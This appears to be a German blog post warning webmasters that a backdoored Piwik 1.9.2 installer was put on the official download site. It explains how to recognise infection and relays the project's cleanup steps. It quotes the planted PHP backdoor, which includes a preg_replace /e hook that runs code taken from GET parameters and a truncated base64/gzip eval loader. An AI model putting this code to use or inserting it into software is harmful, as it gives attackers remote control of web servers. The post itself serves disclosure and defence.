Piwik – infiziertes Installationspaket führt Schadcode aus

Dem quelloffenen und kostenfreien Webseiten-Analyse Tool Piwik wurde ein schadhaftes Installationspaket untergeschoben. Webmaster und Serverbetreiber sollten umgehend ihre Piwik-Installationen daraufhin überprüfen.

Betroffen war das Installationsarchiv der Version 1.9.2, das man von den offiziellen Downloadseiten des Piwik-Projektes herunterladen kann. Piwik räumt ein, dass eine Sicherheitslücke eines Plugins auf ihrer eigenen WordPress-Installation dem Angreifer die Möglichkeit gegeben hat, dem Downloadbereich eine fehlerhafte Datei unterzuschieben.

Woran erkenne ich, ob mein Piwik infiziert ist?

Die Hintertür wird dem Angreifer durch die Datei Load.php im core Verzeichnis geöffnet. Verantwortlich sind diese Codezeilen am Ende der Datei:
<?php Error_Reporting(0); if(isset($_GET[‚g‘]) && isset($_GET[’s‘])) { preg_replace(„/(.+)/e“, $_GET[‚g‘], ‚dwm‘); exit; } if (file_exists(dirname(__FILE__).“/lic.log“)) exit; eval(gzuncompress(base64_decode(eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/O…..

Vor allem die letzte Zeile lädt dann den Schmonzes nach, den ihr nicht auf eurem System haben wollt.
Zusätzlich werden die Dateien lic.log und piwik/core/DataTable/Filter/Megre.php angelegt, die in einer offiziellen Piwik-Installation nichts zu suchen haben.

Was sollte ich jetzt tun?

Wenn bei euch auch nur eines dieser Merkmale zutrifft, rät Piwik zu folgender Vorgehensweise:

  1. Backup der Datei piwik/config/config.ini.php anlegen
  2. das gesamte Piwik Verzeichnis vom Server löschen
  3. die neuste, bereinigte Version vom Piwik-Server herunterladen, entpacken und auf Euren Server hochladen
  4. die zuvor gesicherte Datei config.ini.php wieder nach piwik/config hochladen

Piwik müsste jetzt wieder für Euch erreichbar sein.

Die Meldung kann auch auf dem Heise Newsticker und dem PHP-Magazin nachgelesen werden.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.